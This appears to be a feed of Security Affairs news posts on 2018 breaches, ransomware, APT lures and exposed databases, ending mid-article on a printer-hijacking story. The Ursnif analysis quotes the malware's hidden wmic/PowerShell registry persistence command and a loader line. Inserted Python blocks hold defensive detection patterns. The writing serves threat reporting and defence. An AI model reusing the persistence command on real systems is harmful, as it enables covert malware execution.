The attack presents many similarities with the DNC hack that occurred before the 2016 election, which US intelligence attributed to Russia-linked APT groups.

It is not clear what measures the NRCC had adopted to prevent this kind of intrusion; after being notified, the committee alerted the security firm CrowdStrike.

“Like other major committees, the NRCC also had security procedures in place before the election cycle began to try to limit the amount of information that could be exposed to a potential hacker. It also employed a full-time cybersecurity employee.” concludes Politico.

Pierluigi Paganini

(Security Affairs – National Republican Congressional Committee (NRCC), hacking)

New strain of Ransomware infected over 100,000 PCs in China

Security experts reported a new strain of ransomware spreading in China; the malicious code rapidly infected over 100,000 PCs in just four days.

Unfortunately, the number of infections is rapidly increasing because the hackers compromised a supply chain.

It is interesting to note that this ransomware asks victims to pay a ransom of 110 yuan (nearly 14 euros) through WeChat Pay.

“On December 1, the first ransomware that demanded the “WeChat payment” ransom broke out in the country. According to the monitoring and evaluation of the “Colvet Threat Intelligence System”, as of the evening of the 4th, the virus infected at least 100,000 computers, not only locked the computer.” reads the analysis published by the anti-virus firm Velvet Security.

“The document also steals information on tens of thousands of user passwords on platforms such as Taobao and Alipay.”

Victims are prompted to pay the ransom to the attackers’ WeChat account within 3 days to receive the decryption key. If the victim does not pay within that time, the malicious code deletes the decryption key from the C&C server.

The malicious code also implements password-stealing capabilities: the ransomware is able to steal users’ credentials for popular Chinese services, including Alipay, the NetEase 163 email service, Baidu Cloud Disk, Jingdong (JD.com), Taobao, Tmall, AliWangWang, and QQ websites.

The ransomware also collects information on the infected system, including CPU model, screen resolution, network information and list of installed software.

According to experts from Velvet Security, hackers compromised the supply chain of the “EasyLanguage” programming software used by a large number of application developers.

The tainted software is used by hackers to inject the malicious code into every software compiled through the programming software.

To avoid detection, author of the threat signed the code with a trusted digital certificate issued form from Tencent Technologies and avoid encrypting data in some specific directories, like “Tencent Games, League of Legends, tmp, rtl, and program.

The good news for the victims is that researchers were able to crack the ransomware: the experts discovered that the malware uses a XOR cipher, rather than DES, to encrypt the files, and that it stores a copy of the decryption key locally on the victim’s system at the following path:

%user%\AppData\Roaming\unname_1989\dataFile\appCfg.cfg

Velvet experts released a free ransomware decryption tool that can be used to decrypt documents encrypted by the malware.

Experts attributed the ransomware to a software programmer named “Luo,” and reported their discovery to the Chinese authorities.

Pierluigi Paganini

(Security Affairs – cybercrime, China)

The post New strain of Ransomware infected over 100,000 PCs in China appeared first on Security Affairs.

Security Affairs: M2M protocols can be abused to attack IoT and IIoT systems

Security experts from Trend Micro discovered that some machine-to-machine (M2M) protocols can be abused to attack IoT and industrial Internet of Things (IIoT) systems.

According to a study conducted by experts from Trend Micro and the Polytechnic University of Milan, attackers can abuse M2M protocols to target IoT and IIoT devices.

The experts analyzed two M2M protocols: the Message Queuing Telemetry Transport (MQTT) and the Constrained Application Protocol (CoAP).

The former is a messaging protocol used to establish communication between a broker and multiple clients; the latter is a UDP client-server protocol that allows communication between nodes.

The experts pointed out that attackers could abuse M2M protocols for target reconnaissance, industrial espionage, targeted attacks, and lateral movement.

Researchers monitored both protocols over a period of four months, playing the attacker’s role for their research.

“For data gathering, we played the role of a casual attacker with modest resources, scanning the internet for exposed MQTT brokers and CoAP hosts. In just nearly four months, such a “casual attacker” was able to collect 209,944,707 MQTT messages obtained from 78,549 brokers and 19,208,047 CoAP responses from 441,964 servers.” reads the research paper.

The analysis of the MQTT protocol revealed security flaws that could be exploited to trigger a DoS condition or execute arbitrary code. Trend Micro reported the vulnerabilities to the developers of the affected software, who quickly released patches.

Below is a video PoC of the attacks abusing the MQTT protocol:

The researchers did not find security flaws in the CoAP protocol, but warned that it is susceptible to IP spoofing, which attackers could exploit for DDoS amplification attacks.

“However, the Request for Comments (RFC) defining the protocol, RFC 7252, explicitly pinpoints the security issues (mainly due to the “connectionless” nature of UDP), which we confirmed with a practical experiment.” continues the report.

“On a test network with CoAP clients and servers, we launched an amplification attack with increasing payload size and estimated the maximum bandwidth amplification factor (BAF). According to our estimate, CoAP can reach up to 32 times (32x) amplification factor, which is roughly between the amplification power of DNS and SSDP.”

Experts highlighted the risk that malware could, in the near future, abuse M2M protocols for malicious activity.

“MQTT and CoAP are data protocols playing a fundamental role in M2M communication among consumer and industrial applications. The presence of unsecure MQTT and CoAP deployments shows no improved security awareness since 2017, when this problem was first highlighted for MQTT.” concludes the report.

“Despite the security recommendations being well highlighted in the CoAP RFC, CoAP already suffers from a deployment problem similar to that affecting MQTT. Both MQTT and CoAP have some features that, even in the absence of implementation vulnerabilities, can be abused to the attacker’s advantage. When deploying or using MQTT and CoAP services, the following practical points should be considered.”

Pierluigi Paganini

(Security Affairs – Daniel’s Hosting, dark web)

The post M2M protocols can be abused to attack IoT and IIoT systems appeared first on Security Affairs.




Dissecting the latest Ursnif DHL-Themed Campaign

Security experts at Yoroi – Cybaze Z-Lab discovered a new variant of the infamous Ursnif malware targeting Italian users through a malspam campaign.

Introduction

In recent weeks, a new variant of the infamous Ursnif malware was discovered hitting Italian users through a malspam campaign. Yoroi-Cybaze ZLAB isolated several malicious emails with the following content:

  • Subject: “VS Spedizione DHL AWB 94856978972 proveniente dalla GRAN BRETAGNA AVVISO DI GIACENZA”
  • Attachment: “GR930495-30495.zip”

The attachment contains a .js file which, when launched, starts the infection by downloading other components from the Internet.

The Dropper

The initial dropper is an obfuscated JavaScript. Once run, it generates a lot of noisy Internet traffic in order to make the detection of the real malicious infrastructure harder; as the following figures show, the script contains a series of random-looking URLs it unsuccessfully tries to connect to, generating a huge volume of noise in the analysis environment.

Figure 1: Hard coded urls where the malware tries to connect to generate noise


Figure 2: Generated internet traffic noise

However, the real malicious action performed by the JavaScript is to create a batch file at the “%APPDATA%\Roaming\325623802.bat” path. The file is a simple script containing the following code:

Figure 3: Extracted batch file

The script execution pops up on screen a harmless “FedEx” brochure in PDF format used to decoy the victim; in the meantime it downloads and extracts a PE32 executable file from a CAB archive hosted on a compromised Chinese website.

Figure 4: PDF downloaded from the Internet and shown to the user

The second stage

The second stage of the infection chain is the “ppc.cab” file downloaded by the dropper to the “%APPDATA%\Roaming” location: it actually is a Microsoft Cabinet archive embedding an executable file named “puk.exe”.
The “puk.exe” file promptly spawns a new copy of its own process to make the debugging harder, then it starts several instances of the Internet Explorer process to hide its network activity inside legitimate processes.

Figure 5: spawned processes by the original “puk.exe”

The network traffic generated by the iexplore.exe processes points to the remote destinations 149.129.129.1 (ALICLOUD-IN) and 47.74.131.146 (AL-3), part of the malicious infrastructure of the attacker.

Figure 6: C2 network traffic

The beaconing pattern recognized in the C2 communication is consistent with the Gozi/Ursnif/IFSB/Dreambot malware variants. In addition, the particular “/wpapi/” base URL adopted by the sample matches several malspam campaigns tracked during the current year (rif EW. N070618N030618N010318).

Figure 7: Malware’s beaconing requests

Persistency

The third stage of the malware is designed to ensure its persistence on the infected system in the long run. It sets up a particular registry key containing chunks of binary data: “HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\6C174C70-DB2B-7E6F-C560-3F92C994E3E6”


Figure 9: Registry key written by the malware

Among the registry values shown above there is an entry named “ddraxpps”: this particular name was also used in the persistence mechanism of other Ursnif samples analyzed back in January. The malware also configures a value named “comuroxy” containing a wmic “process call create” command designed to invoke the powershell code stored in the “ddraxpps” entry: C:\Windows\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\6C174C70-DB2B-7E6F-C560-3F92C994E3E6').ddraxpps))".

The “ddraxpps” registry value stores a hex string that can be decoded with a simple hex-to-ASCII conversion; its content is actually the following obfuscated powershell code:

Figure 10: body of “ddraxpps” key

The first line of code shows a set of commands allowing the execution of some kind of payload encoded in decimal format. The array of numbers at line two represents the actual executable payload in decimal notation.

  1. $sagsfg="qmd";function ndltwntg{$sxpjuhsps=[System.Convert]::FromBase64String($args[0]);[System.Text.Encoding]::ASCII.GetString($sxpjuhsps);};

The third line, instead, contains a base64 encoded powershell snippet revealing the usage of a known payload injection technique: the “APC injection” or “AtomBombing”, used to infect the “iexplore.exe” process.


Figure 11: Commands of the third row of “ddraxpps” key

All the commands shown in Figure 11 are necessary to perform the APC injection: the first variable, “$jtwhasq”, imports the necessary library “kernel32.dll”, in particular the functions “GetCurrentProcess()” and “VirtualAllocEx()”. The second row imports the functions “GetCurrentThreadId()”, “QueueUserAPC()” and “OpenThread()”. The third contains the real injection: while the first two lines prepare all the imports, functions and related parameters, the third one is responsible for executing the actual APC injection technique. The first step is to create a virtual section with the “VirtualAllocEx()” function in the current process, identified thanks to “GetCurrentProcess()”. The malware is then copied into the virtual section and, finally, this section is injected into a local thread within the “iexplore.exe” process thanks to the “QueueUserAPC()” function.
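The persistence chain above (wmic “process call create” launching a hidden powershell that evaluates a hex-encoded script read back from the AppDataLow registry value) is something a defender can hunt for offline. The following Python is an added example, not code from the Yoroi analysis: it flags the wmic/powershell command line in constructed process-creation events and decodes a constructed stand-in for the “ddraxpps” value, listing the injection-related API names it carries. The event records and the encoded value are constructed samples; the marker list is an assumption drawn from the functions named in the analysis.

```python
import binascii
import re

# Constructed process-creation events (not real telemetry). The first command line is
# modelled on the wmic/powershell persistence command quoted in the analysis.
SAMPLE_EVENTS = [
    {
        "image": r"C:\Windows\system32\wbem\wmic.exe",
        "cmdline": r'''C:\Windows\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\6C174C70-DB2B-7E6F-C560-3F92C994E3E6').ddraxpps))"''',
    },
    {
        "image": r"C:\Windows\system32\wbem\wmic.exe",
        "cmdline": r"wmic.exe os get caption,version",  # benign admin use of wmic
    },
]

WMIC_CREATE = re.compile(r"\bprocess\s+call\s+create\b", re.I)
# powershell that evaluates (iex) a value read back from the AppDataLow registry hive
REG_BACKED_IEX = re.compile(r"\biex\b.*get-itemproperty.*AppDataLow", re.I | re.S)

# API names the decoded script imports for the APC injection (assumed marker list).
INJECTION_MARKERS = ("FromBase64String", "VirtualAllocEx", "GetCurrentProcess",
                     "GetCurrentThreadId", "OpenThread", "QueueUserAPC", "iexplore.exe")


def is_registry_backed_powershell(cmdline: str) -> bool:
    """True when wmic spawns a powershell whose script body is pulled from the registry."""
    return bool(WMIC_CREATE.search(cmdline)
                and "powershell" in cmdline.lower()
                and REG_BACKED_IEX.search(cmdline))


def flag_events(events):
    """Return the events whose command line matches the persistence pattern."""
    return [e for e in events if is_registry_backed_powershell(e["cmdline"])]


def decode_hex_registry_value(value: str) -> str:
    """Hex-to-ASCII conversion of a value such as 'ddraxpps'.

    Accepts a bare hex string or a regedit-style export ('hex:24,6b,...');
    separators and whitespace are ignored.
    """
    body = re.sub(r"^\s*hex(\(\d+\))?:", "", value, flags=re.I)
    digits = re.sub(r"[^0-9a-fA-F]", "", body)
    if len(digits) % 2:
        raise ValueError("odd number of hex digits")
    return binascii.unhexlify(digits).decode("ascii", errors="replace")


def triage_registry_value(value: str) -> dict:
    """Decode the value and report which injection-related names appear in it."""
    script = decode_hex_registry_value(value)
    found = [m for m in INJECTION_MARKERS if m in script]
    return {"script": script, "markers": found, "suspicious": len(found) >= 2}


# Constructed stand-in for the 'ddraxpps' body: a harmless string carrying the same
# API names the real script imports, hex-encoded the way the malware stores it.
CONSTRUCTED_DDRAXPPS = binascii.hexlify(
    b'$k="qmd";function d{[System.Convert]::FromBase64String($args[0])};'
    b'GetCurrentProcess;VirtualAllocEx;OpenThread;QueueUserAPC;iexplore.exe'
).decode()


if __name__ == "__main__":
    for e in flag_events(SAMPLE_EVENTS):
        print("ALERT registry-backed powershell via wmic:", e["cmdline"][:70], "...")
    print(triage_registry_value(CONSTRUCTED_DDRAXPPS))
```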

Conclusion

In the end, the whole infection chain can be summarized in four stages: the generation of network noise to hide the attacker’s infrastructure, the download of the executable payload, the achievement of persistence through the installed registry key, and the check for and download of the Ursnif modules.


Figure 12. Representation of the infection chain

Further details, including IoCs and Yara rules, are reported in the original blog post published by Yoroi.

Dissecting the latest Ursnif DHL-Themed Campaign

Pierluigi Paganini

(Security Affairs – Ursnif, malware)

The post Dissecting the latest Ursnif DHL-Themed Campaign appeared first on Security Affairs.

Security Affairs: 4 Industries That Have to Fight the Hardest Against Cyberattacks

Society’s dependence on internet-based technologies means security professionals must defend against cyberattacks as well as more traditional threats, such as robbers or disgruntled employees.

However, cybercriminals target some industries at disproportionally high rates. Here are four of them:

1. Health Care

Since health care professionals deal with life-or-death situations, cyberattacks could hinder both productivity and patient care to a tremendous degree. Some attacks shut down entire health systems comprising multiple facilities or force affected individuals to switch from computerized processes to pens and paper.

The medical industry faces an exceptional risk for cyberattacks because there are so many players involved in the sector. More than 83 percent of organizations responding to a recent survey reported making new or improved organizational security enhancements.

That’s notable progress, but analysts also worry about the potential for attacks that don’t directly target hospitals or similar organizations. Recent demonstrations from cybersecurity researchers have shown how it’s possible to hack into medical devices like pacemakers or insulin pumps.

There are also instances of hospitals being unable to perform fundamental services. In November 2018, a ransomware attack forced two hospitals to send ambulances elsewhere and only accept walk-up patients to the emergency rooms.

Hackers know they can wreak substantial havoc by attacking hospitals, thereby increasing the potential for notoriety. It doesn’t hurt that those organizations keep medical records containing valuable information hackers could sell on the black market. One incident at North Carolina-based company Atrium Health potentially breached the data of 2.65 million people.

2. Nonprofit

Nonprofits typically focus their efforts on causes that improve society at large, at-risk groups and others in need. However, cyberattacks could thwart all those intentions to put energy toward the greater good. Research indicates cyberattacks threaten nonprofit organizations for various reasons.

Data from 2017 found only 27 percent of nonprofits broke even that year. So, if nonprofit leaders want to devote more money to cybersecurity, they may feel too financially strapped to make meaningful progress. Plus, many nonprofits have small teams of hired employees and rely heavily on volunteers otherwise. That bare-bones staffing structure could make it harder than average for nonprofits to recover after issues happen.

Also, nonprofits may feel overwhelmed about where to start as they learn about cybersecurity. Fortunately, some products geared toward nonprofits have robust integrated security. Volgistics is a company associated with volunteer management that serves 5,121 organizations. A section on its website details the online and offline measures taken to keep customer data safe.

3. Retail

The retail industry is cyclical, so certain times of the year — including the holiday season or when kids go back to school — are particularly busy. Plus, cybercrime problems could take websites offline or cause reputational damage. Despite those risks, retailers make blunders when budgeting for cybersecurity. A recent report found 50 percent of all data breaches in the U.S. happened at retail establishments.

The study also determined that entities spend the most money on cybersecurity measures considered among the least effective. No matter what, it’s crucial for the retail sector to take cybersecurity seriously. Research from Gemalto found 70 percent of people would stop doing business with companies that suffer data breaches. So, failing to conquer the problem could lead to profit losses in unexpected ways.

4. Financial Services

People rely on banks to do daily transactions for business or personal reasons. And, since financial institutions have extraordinary amounts of money on hand, it’s not surprising they’re prime targets for cybercriminals. Even financial industry businesses that don’t store so many financial resources on site — such as wealth management companies — keep documents filled with clients’ personal details.

The financial sector is also so potentially lucrative for hackers that they may set their sights on carrying out attacks on ATMs in multiple countries. Sources report a North Korean hacking group known as Lazarus is believed to be behind attacks in 23 countries totaling tens of millions of dollars.

There’s an emerging trend of banks hiring ethical hackers to find vulnerabilities and test existing safeguards. That’s a practical way to address cybercrime risks, but it’s an approach that’ll likely become increasingly harder to choose. That’s because there’s already a gigantic cybersecurity skills gap consisting of hundreds of thousands of open cybersecurity positions, and forecasts say the shortage will get worse.


No Industry Is Immune

Any sector that uses the internet to conduct business could become a cybercriminal’s target.

Although the industries mentioned here need to take particular care to prevent issues, proactive steps taken to fix problems and monitor for suspicious issues could keep all companies safer from cybercrime.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her re

Pierluigi Paganini

(Security Affairs – Cybersecurity, cyberattacks)

The post 4 Industries That Have to Fight the Hardest Against Cyberattacks appeared first on Security Affairs.




Quora data breach: hackers obtained information on roughly 100 million users

Another day, another illustrious victim of a data breach: the popular question-and-answer website Quora suffered a major data breach that exposed 100 million users.

On Monday, the popular question-and-answer website Quora disclosed a major data breach: unknown hackers breached its systems and accessed data on 100 million users.

The company is notifying affected users of the incident and has reset their passwords as a precautionary measure; it also reported the incident to law enforcement. Quora hired a forensics and security firm to assist in the investigation.

Quora is still investigating the security breach; it discovered the intrusion on November 30 and attributed it to a “malicious third party.”

“We recently discovered that some user data was compromised as a result of unauthorized access to one of our systems by a malicious third party. We are working rapidly to investigate the situation further and take the appropriate steps to prevent such incidents in the future.” reads the data breach notification.

“On Friday we discovered that some user data was compromised by a third party who gained unauthorized access to one of our systems.”

Exposed data includes name, email address, hashed password, data imported from linked networks, public content and actions (e.g. questions, answers, comments, and upvotes), and non-public content and actions (e.g. answer requests, downvotes, and direct messages).

“While the passwords were encrypted (hashed with a salt that varies for each user), it is generally a best practice not to reuse the same password across multiple services, and we recommend that people change their passwords if they are doing so.” continues the company.

Data belonging to users who posted anonymously was not exposed; financial data and social security numbers are not at risk because the Quora platform doesn’t collect them.

Quora has identified the root cause of the breach and has taken steps to address it, but it did not disclose technical details on the incident.

The company announced additional efforts to mitigate the effects of the incident and to avoid future security breaches.

“Not all Quora users are affected, and some were impacted more than others.” states the FAQ page published by the company.

Pierluigi Paganini

(Security Affairs – Quora, Data breach)

The post Quora data breach: hackers obtained information on roughly 100 million users appeared first on Security Affairs.

Security Affairs: Russia-linked APT Sofacy leverages BREXIT lures in recent attacks

Russia-linked cyber-espionage group Sofacy (aka APT28, Pawn Storm, Fancy Bear, Sednit, Tsar Team, and Strontium) uses BREXIT lures in recent attacks.


The APT group used Brexit-themed bait documents on the same day the UK Prime Minister Theresa May announced the initial BREXIT draft agreement with the European Union (EU).

“As the United Kingdom (UK) Prime Minister Theresa May announced the initial BREXIT draft agreement with the European Union (EU), iDefense analysts identified a new campaign by SNAKEMACKEREL using a BREXIT-themed lure document to deliver the Zekapab (also known as Zebrocy) first-stage malware” reads a report published by Accenture.

The Sofacy APT group has been active since at least 2007 and has targeted governments, militaries, and security organizations worldwide. The group was also involved in the string of attacks that targeted the 2016 Presidential election.

In September 2018, security experts from ESET spotted the first UEFI rootkit ever observed in the wild; the code, tracked as LoJax, was used in real attacks.

In November 2018, malware researchers at the Cybaze ZLab-Yoroi team discovered a new variant of the dangerous APT28 LoJax rootkit.

According to Accenture’s iDefense experts, on November 15 Sofacy attackers were using weaponized documents to deliver the Zebrocy backdoor.

Threat actors used the BREXIT-themed lure documents to load malicious content from an external source using the settings.xml.rels component embedded within the DOCX file.

The macro component downloaded from the external source includes a function called AutoClose(), as well as two payloads embedded as Base64-encoded strings.

Analyzing an IP address (109.248.148.42) involved in the attack, the experts discovered two different .dotm components, attachedTemplate.dotm and templates.dotm.

Both components contain the same VBA macro code, each containing two different embedded payloads: one is an executable binary file and the other is a .docm file.
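The remote-template trick described above leaves a trace in the document package: an attachedTemplate relationship with TargetMode="External" in word/_rels/settings.xml.rels. The following Python is an added example, not code from Accenture’s report: it builds a minimal constructed DOCX archive with such a link and then checks it the way a mail gateway or triage script could. The host name in the sample target is a placeholder, not an indicator from the report.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple
from urllib.parse import urlparse

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
RELS_PATH = "word/_rels/settings.xml.rels"
WP_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"


def external_settings_relationships(docx_bytes: bytes) -> List[Tuple[str, str]]:
    """List (relationship type, target) pairs in settings.xml.rels whose TargetMode is External."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if RELS_PATH not in z.namelist():
            return hits
        root = ET.fromstring(z.read(RELS_PATH))
        for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
            if rel.get("TargetMode", "Internal").lower() == "external":
                short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                hits.append((short_type, rel.get("Target", "")))
    return hits


def is_remote_template_document(docx_bytes: bytes) -> bool:
    """True when the document attaches a template fetched over HTTP(S) at open time."""
    for rel_type, target in external_settings_relationships(docx_bytes):
        if rel_type == "attachedTemplate" and urlparse(target).scheme in ("http", "https"):
            return True
    return False


def build_sample_docx(template_target: Optional[str]) -> bytes:
    """Constructed minimal DOCX-like package (not a real lure) with an optional external template."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml",
                   "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        z.writestr("word/document.xml", f"<w:document xmlns:w='{WP_NS}'/>")
        z.writestr("word/settings.xml",
                   f"<w:settings xmlns:w='{WP_NS}' xmlns:r='{R_NS}'>"
                   f"<w:attachedTemplate r:id='rId1'/></w:settings>")
        if template_target:
            z.writestr(RELS_PATH,
                       f"<Relationships xmlns='{RELS_NS}'>"
                       f"<Relationship Id='rId1' Type='{ATTACHED_TEMPLATE}' "
                       f"Target='{template_target}' TargetMode='External'/>"
                       f"</Relationships>")
    return buf.getvalue()


# Placeholder host; the real campaign's template location is in the Accenture report.
SAMPLE_TARGET = "http://template-host.invalid/attachedTemplate.dotm"

if __name__ == "__main__":
    lure = build_sample_docx(SAMPLE_TARGET)
    clean = build_sample_docx(None)
    print("lure flagged:", is_remote_template_document(lure), external_settings_relationships(lure))
    print("clean flagged:", is_remote_template_document(clean))
```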

“Analysis into the two binaries shows that they are in fact a Delphi (initially UPX packed) and .NET version of the Zekapab first-stage malware.” continues the report.

The malware collects system information and a list of running processes and sends the data to the command and control (C&C) server, which in turn delivers the next-stage malware if the system is deemed interesting.

Further information on the attack, including mitigation, is reported in the analysis published by Accenture.

Pierluigi Paganini

(Security Affairs – Sofacy, Brexit)

The post Russia-linked APT Sofacy leverages BREXIT lures in recent attacks appeared first on Security Affairs.




Experts found data belonging to 82 Million US Users exposed on unprotected Elasticsearch Instances

Security experts at HackenProof are warning that open Elasticsearch instances expose the data of over 82 million users in the United States.

Experts from HackenProof discovered open Elasticsearch instances that expose over 82 million users in the United States.

Elasticsearch is a Java-based search engine built on the free and open-source information retrieval library Lucene. It is released as open source and is used by many organizations worldwide.

Experts discovered 73 gigabytes of data during a regular security audit of publicly available servers. Using the Shodan search engine, the experts discovered three IPs associated with misconfigured Elasticsearch clusters.

“A massive 73 GB data breach was discovered during a regular security audit of publicly available servers with the Shodan search engine.” reads a blog post published by HackenProof.

“Prior to this publication, there were at least 3 IPs with the identical Elasticsearch clusters misconfigured for public access.”

The first IP, discovered by the experts on November 14, contained the personal information of 56,934,021 U.S. citizens (i.e. name, email, address, state, zip, phone number, IP address, and also employer and job title).

Experts discovered a second index of the same archive that contained more than 25 million records with more detailed information (i.e. name, company details, zip address, carrier route, latitude/longitude, census tract, phone number, web address, email, employee count, revenue numbers, NAICS codes, SIC codes, etc.).

Overall, HackenProof says (PDF), 82,851,841 people were impacted by this data breach.

The overall number of records exposed in the unprotected Elasticsearch instances is over 114,686,118; according to HackenProof, 82,851,841 individuals were impacted by this data leak.

At this time it is not clear who owns the exposed Elasticsearch instances; experts speculate that Data & Leads Inc. could be the data source.

Experts attempted to notify the company of the incident, but they did not receive any reply. The company website was taken offline just after the publication of the report.

It is not possible to determine for how long the data remained exposed online; the good news is that the huge trove of data is no longer available.

“While the source of the leak was not immediately identifiable, the structure of the field ‘source’ in data fields is similar to those used by a data management company Data & Leads Inc. However, we weren’t able to get in touch with their representatives.” continues the blog post.

“Moreover, shortly before this publication Data & Leads website went offline and now is unavailable.”

In September, security experts from the firm Kromtech discovered 4,000 compromised instances of the open source analytics and search tool Elasticsearch that were running PoS malware.

In early 2017, the number of internet-accessible Elasticsearch installs was roughly 35,000.

In July, the security researcher Vinny Troia discovered that Exactis, a data broker based in Palm Coast, Florida, had exposed a database that contained close to 340 million individual records on a publicly accessible server.

Unprotected Elasticsearch instances are a gift for hackers and cybercriminals: attackers can compromise them by installing malware and gain full administrative privileges on the underlying servers.
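The misconfiguration behind leaks like this one is an Elasticsearch REST API bound to a public interface with no authentication in front of it, which is exactly what Shodan indexes. As an added example, not HackenProof's tooling and not code from this post, the Python below shows three checks a defender can run against their own clusters: classify what an unauthenticated GET to the REST port returns, total the document counts from _cat/indices to see how many records an open cluster would hand to anyone who finds it, and review elasticsearch.yml for a public network.host without security enabled. The probe responses and the index listing are constructed samples (the record counts echo the figures in the post); the API field names and the network.host and xpack.security.enabled keys are Elasticsearch's own.

```python
import ipaddress
import json

# Constructed sample responses to GET / on the REST port (not captured from the leaked clusters).
OPEN_ROOT_RESPONSE = (200, json.dumps({
    "name": "node-1", "cluster_name": "elasticsearch",
    "version": {"number": "6.4.2"}, "tagline": "You Know, for Search",
}))
AUTH_ROOT_RESPONSE = (401, json.dumps({"error": {"type": "security_exception"}}))

# Constructed GET /_cat/indices?format=json listing of an open cluster.
CAT_INDICES = json.dumps([
    {"index": "people", "docs.count": "56934021", "store.size": "48gb"},
    {"index": "companies", "docs.count": "25000000", "store.size": "25gb"},
    {"index": ".kibana", "docs.count": "3", "store.size": "12kb"},
])


def classify_probe(status: int, body: str) -> str:
    """Interpret an unauthenticated GET / against the REST port (default 9200)."""
    if status in (401, 403):
        return "auth-required"
    if status == 200:
        try:
            doc = json.loads(body)
        except ValueError:
            return "unknown"
        # A caller that can read cluster_name and version anonymously can read the indices too.
        if "cluster_name" in doc and "version" in doc:
            return "open"
    return "unknown"


def exposed_records(cat_indices_json: str) -> tuple:
    """Return (total documents, [index names]) from a _cat/indices?format=json listing,
    ignoring system indices (names starting with a dot)."""
    total, names = 0, []
    for entry in json.loads(cat_indices_json):
        if entry["index"].startswith("."):
            continue
        total += int(entry["docs.count"])
        names.append(entry["index"])
    return total, names


def audit_settings(settings: dict) -> list:
    """Flag elasticsearch.yml settings (given as a flat dict) that put the REST API on a
    reachable interface without authentication in front of it."""
    findings = []
    host = settings.get("network.host", "127.0.0.1")  # Elasticsearch default: loopback only
    public = host in ("0.0.0.0", "_global_", "_site_")
    if not public:
        try:
            public = ipaddress.ip_address(host).is_global
        except ValueError:
            public = False  # interface names and other special values: not judged here
    if public:
        findings.append(f"network.host={host} binds the HTTP API to a reachable interface")
        if not settings.get("xpack.security.enabled", False):
            findings.append("no authentication (xpack.security.enabled is not true) on that listener")
    return findings


if __name__ == "__main__":
    print(classify_probe(*OPEN_ROOT_RESPONSE), classify_probe(*AUTH_ROOT_RESPONSE))
    print(exposed_records(CAT_INDICES))
    print(audit_settings({"network.host": "0.0.0.0"}))
```

The probe is the same view Shodan has of the cluster, so running it from outside your own network (against your own addresses) is the quickest way to confirm there is nothing to find; keep the REST port bound to loopback or a private interface and place authentication or a reverse proxy in front of anything that must be reachable.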

Pierluigi Paganini

(Security Affairs – Elasticsearch installs, hacking)

The post Experts found data belonging to 82 Million US Users exposed on unprotected Elasticsearch Instances appeared first on Security Affairs.

Security Affairs: New Zealand Security Bureau halts Spark from using Huawei 5G equipment

New Zealand intelligence agency asked mobile company Spark to avoid using Huawei equipment for 5G infrastructure.

According to New Zealand’s Government Communications Security Bureau, Huawei equipment for 5G infrastructure poses a “significant network security risk”; for this reason, it asked the mobile company Spark to avoid using the equipment of the Chinese company.

The announcement follows the decision of the Australian Government to ban Huawei equipment from Australia’s 5G network due to security concerns.

New Zealand is a member of the Five Eyes intelligence alliance; the other member countries (UK, US, Australia), except Canada, have banned Huawei over security fears.

The Chinese company was founded by a former People’s Liberation Army official in 1987. The US was the first country to warn of the security risks associated with the use of products manufactured by the Chinese telecommunications giant.

The Chinese firm denies having shared Australian customer data with Chinese intelligence, but this was not enough for the Australian Government.

Australian authorities also banned the Chinese firm ZTE Corp.

Huawei was already helping Spark to build 5G mobile networks.

“In New Zealand, Huawei has previously helped build mobile networks. In March, Spark and Huawei showcased a 5G test site across the street from the Parliament, in a publicity move that was attended by then Broadcasting Minister Clare Curran.” reported the Associated Press.

China and New Zealand have a good commercial partnership and the ban imposed by the government could have severe repercussions on it. In 2008, New Zealand signed a free-trade deal with China.

“The economic and trade cooperation between China and New Zealand is mutually beneficial in nature,” said Foreign Ministry spokesman Geng Shuang.

“We hope New Zealand will provide a level-playing field for Chinese enterprises’ operation there and do something conducive for mutual trust and cooperation.”

What is Spark’s opinion on the ban?

The company is disappointed with the decision by New Zealand’s Government Communications Security Bureau; it is doing its best to launch the 5G network by July 2020.

“Spark said it had wanted to use Huawei 5G equipment in its planned Radio Access Network, which involves technology associated with cell tower infrastructure.” concludes the AP.

“The company said it has not yet had time to review the detailed reasoning behind the spy agency’s decision, or whether it will take further steps.”

Pierluigi Paganini

(Security Affairs – New Zealand, Huawei)

The post New Zealand Security Bureau halts Spark from using Huawei 5G equipment appeared first on Security Affairs.



Hacker hijacks printers worldwide to promote popular YouTube channel

TheHackerGiraffe used the Printer Exploitation Toolkit (PRET) to hijack over 50,000 vulnerable printers to promote the PewDiePie YouTube channel.

An anonymous hacker hijacked over 50,000 internet-connected printers worldwide to print out messages promoting the subscription to the PewDiePie YouTube channel. Felix Arvid Ulf Kjellberg, aka PewDiePie, is a popular Swedish Youtuber, comedian, and video game commentator, formerly best known for his Let’s Play commentaries and now mostly known for his comedy and vlogs.

This is the latest act in the dispute over the “most-subscribed YouTube channel” crown between T-Series and PewDiePie.

PewDiePie has more than 73 million YouTube subscribers.

Now a hacker using the Twitter account TheHackerGiraffe decided to promote his favourite YouTube channel in his own way: he hacked tens of thousands of printers exposed online.

The hacker used Shodan to scan the Internet for printers with port 9100 open and hacked them to print a message inviting the victims to unsubscribe from the T-Series channel and subscribe to PewDiePie instead.

“PewDiePie is in trouble, and he needs your help to defeat T-Series!”

“PewDiePie, the currently most subscribed to channel on YouTube, is at stake of losing his position as the number one position by an Indian company called T-Series that simply uploads videos of Bollywood trailers and campaigns,”

